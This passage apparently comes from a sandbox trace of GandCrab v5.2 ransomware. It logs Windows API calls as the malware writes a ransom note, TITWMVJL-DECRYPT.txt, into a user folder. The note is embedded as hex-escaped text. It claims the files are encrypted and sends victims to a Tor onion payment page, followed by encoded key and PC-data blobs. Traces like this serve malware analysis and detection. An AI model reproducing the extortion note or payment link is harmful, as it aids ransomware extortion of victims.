flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0094.880] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\y1mF\\\\TITWMVJL-DECRYPT.txt") returned 57 [0094.880] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\y1mF\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\y1mf\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0094.881] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0094.881] WriteFile (in: hFile=0x2ac, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f274, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f274*=0x2162, lpOverlapped=0x0) returned 1 [0094.882] CloseHandle (hObject=0x2ac) returned 1 [0094.882] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.882] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0094.882] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x28, wMilliseconds=0xc5)) [0094.882] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 